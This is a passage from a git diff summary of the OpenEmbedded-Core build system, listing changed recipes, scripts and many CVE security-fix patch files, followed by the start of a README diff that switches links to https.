-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch36
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb6
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch207
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch44
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch59
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch69
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch214
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch60
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb14
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch33
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb19
-rw-r--r--meta/recipes-multimedia/lame/lame_3.100.bb3
-rw-r--r--meta/recipes-multimedia/liba52/liba52_0.7.4.bb3
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch21
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb1
-rw-r--r--meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb6
-rw-r--r--meta/recipes-multimedia/libpng/files/run-ptest29
-rw-r--r--meta/recipes-multimedia/libpng/libpng_1.6.37.bb18
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb2
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch36
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch44
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch30
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch46
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb9
-rw-r--r--meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch52
-rw-r--r--meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch148
-rw-r--r--meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch27
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch119
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch55
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch42
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch36
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch39
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch217
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch37
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch58
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch183
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch159
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch29
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch659
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch123
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch277
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch45
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch548
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch26
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch157
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch135
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch91
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch173
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch90
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch33
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch59
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch47
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch67
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch53
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch191
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch152
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch46
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch28
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch212
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch62
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/tiff_4.1.0.bb53
-rw-r--r--meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb6
-rw-r--r--meta/recipes-multimedia/pulseaudio/pulseaudio.inc7
-rw-r--r--meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch30
-rw-r--r--meta/recipes-multimedia/speex/speex_1.2.0.bb4
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-1999.patch55
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch366
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch53
-rw-r--r--meta/recipes-multimedia/webp/libwebp_1.1.0.bb6
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests.inc2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests_1.1.bb3
-rw-r--r--meta/recipes-sato/images/core-image-sato-dev.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-ptest-fast.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk-ptest.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb6
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb3
-rw-r--r--meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb1
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb4
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb2
-rw-r--r--meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb1
-rw-r--r--meta/recipes-sato/puzzles/puzzles_git.bb3
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc1
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch30
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch31
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch66
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch15
-rw-r--r--meta/recipes-sato/webkit/webkitgtk_2.28.4.bb (renamed from meta/recipes-sato/webkit/webkitgtk_2.28.2.bb)18
-rw-r--r--meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb3
-rw-r--r--meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch135
-rw-r--r--meta/recipes-support/apr/apr-util_1.6.3.bb (renamed from meta/recipes-support/apr/apr-util_1.6.1.bb)13
-rw-r--r--meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch20
-rw-r--r--meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch58
-rw-r--r--meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch25
-rw-r--r--meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch63
-rw-r--r--meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch76
-rw-r--r--meta/recipes-support/apr/apr/libtoolize_check.patch21
-rw-r--r--meta/recipes-support/apr/apr_1.7.2.bb (renamed from meta/recipes-support/apr/apr_1.7.0.bb)27
-rw-r--r--meta/recipes-support/argp-standalone/argp-standalone_1.3.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb13
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/atk/at-spi2-atk_2.34.1.bb2
-rw-r--r--meta/recipes-support/atk/at-spi2-core_2.34.0.bb4
-rw-r--r--meta/recipes-support/atk/atk_2.34.1.bb1
-rw-r--r--meta/recipes-support/attr/acl_2.2.53.bb5
-rw-r--r--meta/recipes-support/attr/attr.inc2
-rw-r--r--meta/recipes-support/bash-completion/bash-completion_2.10.bb5
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.5.bb4
-rw-r--r--meta/recipes-support/boost/boost-1.72.0.inc2
-rw-r--r--meta/recipes-support/boost/boost.inc6
-rw-r--r--meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch32
-rw-r--r--meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch24
-rw-r--r--meta/recipes-support/boost/boost/arm-intrinsics.patch55
-rw-r--r--meta/recipes-support/boost/boost_1.72.0.bb4
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch37
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch20
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch34
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20190110.bb)17
-rw-r--r--meta/recipes-support/consolekit/consolekit_0.4.6.bb2
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8231.patch1092
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8284.patch209
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8285.patch260
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8286.patch133
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22876.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22890.patch464
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22898.patch26
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch226
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch43
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946.patch328
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22947.patch352
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-22576.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-1.patch45
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-2.patch80
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-3.patch83
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-4.patch35
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27775.patch39
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27776.patch114
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27781.patch46
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-1.patch363
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-2.patch71
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32206.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32207.patch284
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32208.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32221.patch29
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35252.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35260.patch68
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-43552.patch82
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-23916.patch231
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27533.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch51
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534.patch33
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch236
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535.patch170
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27536.patch55
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27538.patch31
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch197
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28321.patch272
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28322.patch380
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-32001.patch38
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38545.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38546.patch132
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2024-2398.patch88
-rw-r--r--meta/recipes-support/curl/curl_7.69.1.bb59
-rw-r--r--meta/recipes-support/db/db_5.3.28.bb3
-rw-r--r--meta/recipes-support/debianutils/debianutils_4.9.1.bb5
-rw-r--r--meta/recipes-support/diffoscope/diffoscope_172.bb (renamed from meta/recipes-support/diffoscope/diffoscope_136.bb)11
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.1.bb2
-rw-r--r--meta/recipes-support/enchant/enchant2_2.2.8.bb3
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch50
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch31
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch30
-rw-r--r--meta/recipes-support/fribidi/fribidi_1.0.9.bb9
-rw-r--r--meta/recipes-support/gdbm/gdbm_1.18.1.bb3
-rw-r--r--meta/recipes-support/gmp/gmp/cve-2021-43618.patch27
-rw-r--r--meta/recipes-support/gmp/gmp_6.2.0.bb1
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch24
-rw-r--r--meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch44
-rw-r--r--meta/recipes-support/gnupg/gnupg/relocate.patch20
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb (renamed from meta/recipes-support/gnupg/gnupg_2.2.20.bb)10
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch67
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch65
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch37
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch282
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch85
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch206
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch125
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.6.14.bb11
-rw-r--r--meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch45
-rw-r--r--meta/recipes-support/gnutls/libtasn1_4.16.0.bb3
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.13.1.bb5
-rw-r--r--meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch24
-rw-r--r--meta/recipes-support/icu/icu_66.1.bb4
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.4.bb5
-rw-r--r--meta/recipes-support/itstool/itstool_2.0.6.bb4
-rw-r--r--meta/recipes-support/libassuan/libassuan_2.5.3.bb3
-rw-r--r--meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb1
-rw-r--r--meta/recipes-support/libbsd/libbsd_0.10.0.bb6
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2602.patch52
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2603.patch58
-rw-r--r--meta/recipes-support/libcap/libcap_2.32.bb8
-rw-r--r--meta/recipes-support/libcheck/libcheck_0.14.0.bb5
-rw-r--r--meta/recipes-support/libcroco/files/CVE-2020-12825.patch192
-rw-r--r--meta/recipes-support/libcroco/libcroco_0.6.13.bb6
-rw-r--r--meta/recipes-support/libdaemon/libdaemon_0.14.bb4
-rw-r--r--meta/recipes-support/libevdev/libevdev/determinism.patch3
-rw-r--r--meta/recipes-support/libevdev/libevdev_1.8.0.bb3
-rw-r--r--meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch33
-rw-r--r--meta/recipes-support/libevent/libevent_2.1.11.bb6
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0198.patch66
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0452.patch39
-rw-r--r--meta/recipes-support/libexif/libexif_0.6.22.bb5
-rw-r--r--meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch104
-rw-r--r--meta/recipes-support/libffi/libffi_3.3.bb1
-rw-r--r--meta/recipes-support/libfm/libfm-extra_1.3.1.bb1
-rw-r--r--meta/recipes-support/libfm/libfm_1.3.1.bb2
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch77
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch109
-rw-r--r--meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb8
-rw-r--r--meta/recipes-support/libgpg-error/libgpg-error_1.37.bb1
-rw-r--r--meta/recipes-support/libical/libical_3.0.7.bb4
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb2
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-3515.patch47
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-47629.patch69
-rw-r--r--meta/recipes-support/libksba/libksba_1.3.5.bb10
-rw-r--r--meta/recipes-support/libnl/libnl_3.5.0.bb5
-rw-r--r--meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch41
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch30
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch59
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch660
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch74
-rw-r--r--meta/recipes-support/libpcre/libpcre2_10.34.bb6
-rw-r--r--meta/recipes-support/libpcre/libpcre_8.44.bb3
-rw-r--r--meta/recipes-support/libproxy/libproxy_0.4.15.bb4
-rw-r--r--meta/recipes-support/libpsl/libpsl_0.21.0.bb13
-rw-r--r--meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb6
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch420
-rw-r--r--meta/recipes-support/libunwind/libunwind_1.3.1.bb1
-rw-r--r--meta/recipes-support/liburcu/liburcu_0.11.1.bb3
-rw-r--r--meta/recipes-support/libusb/libusb1_1.0.22.bb6
-rw-r--r--meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch201
-rw-r--r--meta/recipes-support/libxslt/libxslt_1.1.34.bb10
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.2.bb10
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb4
-rw-r--r--meta/recipes-support/lzop/lzop_1.04.bb1
-rw-r--r--meta/recipes-support/mpfr/mpfr_4.0.2.bb1
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch215
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch122
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch48
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch277
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch163
-rw-r--r--meta/recipes-support/nettle/nettle_3.5.1.bb11
-rw-r--r--meta/recipes-support/npth/npth_1.6.bb1
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb (renamed from meta/recipes-support/p11-kit/p11-kit_0.23.20.bb)9
-rw-r--r--meta/recipes-support/popt/popt_1.16.bb1
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb4
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch347
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch243
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch156
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch166
-rw-r--r--meta/recipes-support/re2c/re2c_1.0.1.bb10
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch26
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.9.bb5
-rw-r--r--meta/recipes-support/serf/serf_1.3.9.bb10
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb3
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35525.patch21
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35527.patch22
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2021-20223.patch23
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2022-35737.patch29
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2023-7104.patch46
-rw-r--r--meta/recipes-support/sqlite/sqlite3.inc1
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.31.1.bb7
-rw-r--r--meta/recipes-support/taglib/taglib_1.11.1.bb1
-rw-r--r--meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch13
-rw-r--r--meta/recipes-support/vim/files/disable_acl_header_check.patch15
-rw-r--r--meta/recipes-support/vim/files/no-path-adjust.patch8
-rw-r--r--meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch13
-rw-r--r--meta/recipes-support/vim/vim-tiny_9.0.bb (renamed from meta/recipes-support/vim/vim-tiny_8.2.bb)0
-rw-r--r--meta/recipes-support/vim/vim.inc49
-rw-r--r--meta/recipes-support/vim/vim_9.0.bb (renamed from meta/recipes-support/vim/vim_8.2.bb)0
-rw-r--r--meta/recipes-support/vte/vte_0.58.3.bb2
-rwxr-xr-xscripts/bitbake-whatchanged2
-rwxr-xr-xscripts/buildhistory-diff5
-rwxr-xr-xscripts/contrib/build-perf-test-wrapper.sh15
-rwxr-xr-xscripts/contrib/convert-srcuri.py77
-rwxr-xr-xscripts/contrib/documentation-audit.sh2
-rwxr-xr-xscripts/contrib/oe-build-perf-report-email.py167
-rwxr-xr-xscripts/create-pull-request2
-rwxr-xr-xscripts/git26
-rw-r--r--scripts/lib/buildstats.py4
-rw-r--r--scripts/lib/checklayer/__init__.py11
-rw-r--r--scripts/lib/checklayer/cases/common.py2
-rw-r--r--scripts/lib/devtool/deploy.py12
-rw-r--r--scripts/lib/devtool/menuconfig.py2
-rw-r--r--scripts/lib/devtool/standard.py46
-rw-r--r--scripts/lib/recipetool/create.py18
-rw-r--r--scripts/lib/resulttool/report.py5
-rw-r--r--scripts/lib/resulttool/resultutils.py8
-rw-r--r--scripts/lib/scriptutils.py10
-rw-r--r--scripts/lib/wic/engine.py6
-rw-r--r--scripts/lib/wic/help.py10
-rw-r--r--scripts/lib/wic/ksparser.py18
-rw-r--r--scripts/lib/wic/misc.py24
-rw-r--r--scripts/lib/wic/partition.py106
-rw-r--r--scripts/lib/wic/pluginbase.py8
-rw-r--r--scripts/lib/wic/plugins/imager/direct.py57
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-efi.py7
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-partition.py2
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-pcbios.py6
-rw-r--r--scripts/lib/wic/plugins/source/rootfs.py85
-rwxr-xr-xscripts/nativesdk-intercept/chgrp27
-rwxr-xr-xscripts/nativesdk-intercept/chown27
-rwxr-xr-xscripts/oe-depends-dot21
-rwxr-xr-xscripts/oe-pkgdata-browser2
-rwxr-xr-xscripts/oe-pkgdata-util3
-rwxr-xr-xscripts/oe-run-native2
-rwxr-xr-xscripts/oe-setup-builddir4
-rw-r--r--scripts/postinst-intercepts/update_font_cache2
-rw-r--r--scripts/pybootchartgui/pybootchartgui/draw.py7
-rw-r--r--scripts/pybootchartgui/pybootchartgui/parsing.py2
-rwxr-xr-xscripts/relocate_sdk.py10
-rwxr-xr-xscripts/runqemu55
-rwxr-xr-xscripts/verify-bashisms2
-rwxr-xr-xscripts/wic8
-rwxr-xr-xscripts/yocto-check-layer28
1731 files changed, 124431 insertions, 6956 deletions
diff --git a/README.OE-Core b/README.OE-Core
index 521916cd4f..2f2127fb03 100644
--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
DISTRO = "nodistro") and contains only emulated machine support.
For information about OpenEmbedded, see the OpenEmbedded website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
The Yocto Project has extensive documentation about OE including a reference manual
which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org/
Contributing
------------
Please refer to
